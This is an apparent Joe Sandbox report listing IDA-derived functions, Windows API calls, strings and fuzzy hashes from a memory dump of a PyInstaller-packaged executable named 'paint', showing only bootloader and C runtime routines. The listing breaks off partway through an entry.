Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: d68df71cf8db1756540facce7fa608ee59de41f47d3402f698371324708d94e4
Instruction ID: f3053970c7765fdc275e4e6a1a0df4409fb8cdfbd2eb3e872ea777182c681ac3
Opcode Fuzzy Hash: d68df71cf8db1756540facce7fa608ee59de41f47d3402f698371324708d94e4
Instruction Fuzzy Hash: CE419425A09653B2EB10DB52A8006B9A396FF46BC4FC44831EE2E877C5EF3EE5458740

Function 00007FF6F0BD1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6F0BD1518
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD14DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD15DF
malloc, xrefs: 00007FF6F0BD151F
fseek, xrefs: 00007FF6F0BD14E5
fread, xrefs: 00007FF6F0BD15E6

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 8bd1f5f2c04e28d282f40171ac874fe6bf77ec46ce63e2dbfd9812a0e69595ca
Instruction ID: 6bba4a8ddf6175e95ce4486ca9e9fecd103b7d935a5f7fea0a559699a4d64032
Opcode Fuzzy Hash: 8bd1f5f2c04e28d282f40171ac874fe6bf77ec46ce63e2dbfd9812a0e69595ca
Instruction Fuzzy Hash: C9418F21A09643B5EB10DB61A4005B9A395EF96788FC44932EE2F87BD5FF3EE541C740

Function 00007FF6F0BDEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6F0BDEAD5

Part of subcall function 00007FF6F0BDFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF6F0BDFA6F
Part of subcall function 00007FF6F0BDFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6F0BDFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6F0BDEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6F0BDEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6F0BDEF08

Strings

csm, xrefs: 00007FF6F0BDEBD0
csm, xrefs: 00007FF6F0BDEB56
csm, xrefs: 00007FF6F0BDEAEF

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: af8c24269209165b98cb0864f414d9f6bf6914952fe75db10fabfb79404f2578
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 82D18332A0974196EB60AF25D4403ADB7A2FB56788F500136EEAE977D5EF39E140C700

Function 00007FF6F0BD2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
MessageBoxW.USER32 ref: 00007FF6F0BD2D99

Strings

[PYI-%d:ERROR] , xrefs: 00007FF6F0BD2CA6
%ls: , xrefs: 00007FF6F0BD2D22
<FormatMessageW failed.>, xrefs: 00007FF6F0BD2D70
Error, xrefs: 00007FF6F0BD2D8C

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 74a1d41eeb86fb3bacc1a54d940c81f37d22737b76f742503b2c4ee3a7605bbe
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 6A31E736B08B4162E7209B61A8146ABA696BF85788F810135EF5ED3799FF3DD546C300

Function 00007FF6F0BDDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDBD
GetLastError.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE63
GetProcAddress.KERNEL32(?,?,?,00007FF6F0BDDFEA,?,?,?,00007FF6F0BDDCDC,?,?,?,00007FF6F0BDD8D9), ref: 00007FF6F0BDDE6F

Strings

api-ms-, xrefs: 00007FF6F0BDDDDD

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: cd9b4745b9f245c73ef0761b963d4302fbcde324ea49b6a6bd431ce616866e7a
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 6F31B421B1B602A2EF219B52A800675A399FF5ABA0FC94535DD7E8B3C0FF3DE4448304

Function 00007FF6F0BD6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6F0BD6446
Failed to load Python DLL '%ls'., xrefs: 00007FF6F0BD6497
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6F0BD63F7
LoadLibrary, xrefs: 00007FF6F0BD649E
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6F0BD63B7
ucrtbase.dll, xrefs: 00007FF6F0BD63CD

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 000d3c0ba2a76c19acdfa3f92c70f1ba62d85c5c89aa60ed4ccaf1b4f31aef85
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 04418025A19687B1EB21DB64E4152E9A326FF56344FC00132EA6E837D6FF3DE505C740

Function 00007FF6F0BD2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6F0BD351A,?,00000000,00007FF6F0BD3F23), ref: 00007FF6F0BD2AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF6F0BD2B0F
Warning, xrefs: 00007FF6F0BD2B1E
0, xrefs: 00007FF6F0BD2B16
[PYI-%d:%s] , xrefs: 00007FF6F0BD2AA8
WARNING, xrefs: 00007FF6F0BD2AAF

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: c45071b39fe7a203cf4105d7ff0325b1c81044151180f5b5fbfefcafb3be323a
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 91218372619782A2E7209B51B4417E6A3A4FB897C4F800131EE9E93799EF3DD1458740

Function 00007FF6F0BEB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6F0BEB1CF
FlsGetValue.KERNEL32 ref: 00007FF6F0BEB1E4
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB205
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB232
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB243
FlsSetValue.KERNEL32 ref: 00007FF6F0BEB254
SetLastError.KERNEL32 ref: 00007FF6F0BEB26F

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction ID: bbf68cfa50da0a2ef77e92b39c4dc447a4e2413ee47612c2d0c3431193a22681
Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction Fuzzy Hash: 96216820F0C203A2FB686761565153EA6525F467A0F808774EA3FC6BDBFE3EB4008301

Function 00007FF6F0BF7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6F0BF7E0D
GetLastError.KERNEL32 ref: 00007FF6F0BF7E19
CloseHandle.KERNEL32 ref: 00007FF6F0BF7E31
CreateFileW.KERNEL32 ref: 00007FF6F0BF7E5C
WriteConsoleW.KERNEL32 ref: 00007FF6F0BF7E7B

Strings

CONOUT$, xrefs: 00007FF6F0BF7E3D

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: e38d1d0bbaa1cf34920b9637b55754055e6fecf8fefd53a746e6bffa39d3b7e5
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: E311D035B18A4182F3608B92E85472976A8FB89BE5F440234EA6EC77E4EF3DD904C740

Function 00007FF6F0BD8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD85E9

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD870A

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 0ef6f20dda38a34aa6ed094f57ae08ab0b7df4001c51ce10687f89d8e248adfb
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: F441E562B1A68251E7309F11A5046AAA395FF86BD5F840131DF6ED7BC9FE3DE401C700

Function 00007FF6F0BEB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB347
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB37D
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3CC
SetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3E7

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction ID: 498e2a346c6e4d6ad3005ace1b4cd4972917cc49782e3d3440c486b9754c78e5
Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
Instruction Fuzzy Hash: F8114720B0C642A2FB54A721569253E62569F4A7B0F948774E83FC67DBFE3EB4018305

Function 00007FF6F0BD2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E

Strings

%s: %s, xrefs: 00007FF6F0BD29E8
Error [ANSI Fallback], xrefs: 00007FF6F0BD29FF
[PYI-%d:ERROR] , xrefs: 00007FF6F0BD2966
Error, xrefs: 00007FF6F0BD2A0E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: 849db7d120f753c6d905a6fee6b2a74acd22be8ef9b34388b567b721fa819d15
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: EE312626B1968162E7209761A8406E7A395BF897D4F800132EE9EC37C5FF3DD146C300

Function 00007FF6F0BD2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6F0BD23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6F0BD248E
DeleteObject.GDI32 ref: 00007FF6F0BD24C1
DestroyIcon.USER32 ref: 00007FF6F0BD24D3

Strings

Unhandled exception in script, xrefs: 00007FF6F0BD23F8

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: 13a9d47979c9959116efc00275545185385d379e74e573f891bde93df243b9cd
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 0D31C47660968299EB20DF61F8556F96364FF8A784F800131EE5E87B8AEF3DC104C700

Function 00007FF6F0BD2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6F0BD918F,?,00007FF6F0BD3C55), ref: 00007FF6F0BD2BA0
MessageBoxW.USER32 ref: 00007FF6F0BD2C2A

Strings

WARNING, xrefs: 00007FF6F0BD2BAF
Warning, xrefs: 00007FF6F0BD2C1D
[PYI-%d:%ls] , xrefs: 00007FF6F0BD2BA8

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: db4af9d99140d13ef61edf2c45e588141658d9e87194cf05147acc2d73963dad
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: D921D166709B81A2E7109B54F8447AA63A5EB89784F800132EA8E9779AEF3DD205C700

Function 00007FF6F0BD2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6F0BD1B99), ref: 00007FF6F0BD2760

Strings

ERROR, xrefs: 00007FF6F0BD276F
Error [ANSI Fallback], xrefs: 00007FF6F0BD27CF
[PYI-%d:%s] , xrefs: 00007FF6F0BD2768
Error, xrefs: 00007FF6F0BD27DE

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
